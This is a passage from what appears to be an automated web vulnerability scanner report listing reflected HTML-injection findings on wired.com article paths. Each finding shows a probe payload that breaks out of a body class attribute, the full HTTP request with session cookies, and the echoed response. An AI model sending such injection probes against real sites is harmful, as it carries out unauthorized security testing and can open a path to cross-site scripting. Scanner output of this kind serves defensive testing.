Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:23 GMT
Date: Sun, 21 Nov 2010 23:11:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news8058d"><a>0c1616ffa46">
...[SNIP]...

1.214. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0408 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0408

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2776e"><a>2cf882d2876 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science2776e"><a>2cf882d2876/discoveries/news/2007/04/dayintech_0408 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:38 GMT
Date: Sun, 21 Nov 2010 23:09:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science2776e"><a>2cf882d2876 ss_discoveries c_news">
...[SNIP]...

1.215. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0408 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0408

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94cdc"><a>0cc65881279 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries94cdc"><a>0cc65881279/news/2007/04/dayintech_0408 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:07 GMT
Date: Sun, 21 Nov 2010 23:10:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries94cdc"><a>0cc65881279 c_news">
...[SNIP]...

1.216. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0408 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0408

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7dad"><a>bdaa03d0efd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newsb7dad"><a>bdaa03d0efd/2007/04/dayintech_0408 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:27 GMT
Date: Sun, 21 Nov 2010 23:10:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newsb7dad"><a>bdaa03d0efd">
...[SNIP]...

1.217. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0411 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0411

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45d4a"><a>db634723549 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science45d4a"><a>db634723549/discoveries/news/2007/04/dayintech_0411 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:05 GMT
Date: Sun, 21 Nov 2010 23:10:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science45d4a"><a>db634723549 ss_discoveries c_news">
...[SNIP]...

1.218. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0411 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0411

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52754"><a>779fdc29594 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries52754"><a>779fdc29594/news/2007/04/dayintech_0411 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:34 GMT
Date: Sun, 21 Nov 2010 23:10:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries52754"><a>779fdc29594 c_news">
...[SNIP]...

1.219. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0411 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0411

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c53d"><a>70481f04aba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news1c53d"><a>70481f04aba/2007/04/dayintech_0411 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:45 GMT
Date: Sun, 21 Nov 2010 23:10:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news1c53d"><a>70481f04aba">
...[SNIP]...

1.220. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0426 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0426

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2f61"><a>cb8010c293b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencee2f61"><a>cb8010c293b/discoveries/news/2007/04/dayintech_0426 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:51 GMT
Date: Sun, 21 Nov 2010 23:09:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencee2f61"><a>cb8010c293b ss_discoveries c_news">
...[SNIP]...

1.221. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0426 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0426

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76756"><a>179b35b8b9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries76756"><a>179b35b8b9f/news/2007/04/dayintech_0426 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:21 GMT
Date: Sun, 21 Nov 2010 23:10:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries76756"><a>179b35b8b9f c_news">
...[SNIP]...

1.222. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0426 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0426

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e6c7"><a>f3b3a70bcbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news7e6c7"><a>f3b3a70bcbe/2007/04/dayintech_0426 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:37 GMT
Date: Sun, 21 Nov 2010 23:10:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news7e6c7"><a>f3b3a70bcbe">
...[SNIP]...

1.223. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0427 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0427

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78e8c"><a>82286881d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science78e8c"><a>82286881d2/discoveries/news/2007/04/dayintech_0427 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:40 GMT
Date: Sun, 21 Nov 2010 23:09:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science78e8c"><a>82286881d2 ss_discoveries c_news">
...[SNIP]...

1.224. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0427 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0427

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82709"><a>31e9f734c89 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries82709"><a>31e9f734c89/news/2007/04/dayintech_0427 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:08 GMT
Date: Sun, 21 Nov 2010 23:10:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries82709"><a>31e9f734c89 c_news">
...[SNIP]...

1.225. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0427 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0427

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59461"><a>c9541460a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news59461"><a>c9541460a9/2007/04/dayintech_0427 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:27 GMT
Date: Sun, 21 Nov 2010 23:10:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news59461"><a>c9541460a9">
...[SNIP]...

1.226. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0503 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0503

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2efb"><a>fefb1eda5ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencee2efb"><a>fefb1eda5ce/discoveries/news/2007/05/dayintech_0503 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:15 GMT
Date: Sun, 21 Nov 2010 23:10:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencee2efb"><a>fefb1eda5ce ss_discoveries c_news">
...[SNIP]...

1.227. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0503 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0503

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60a82"><a>54e3f66b7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries60a82"><a>54e3f66b7a/news/2007/05/dayintech_0503 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:39 GMT
Date: Sun, 21 Nov 2010 23:10:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries60a82"><a>54e3f66b7a c_news">
...[SNIP]...

1.228. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0503 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0503

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91895"><a>1c7fed98e1a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news91895"><a>1c7fed98e1a/2007/05/dayintech_0503 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:54 GMT
Date: Sun, 21 Nov 2010 23:10:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
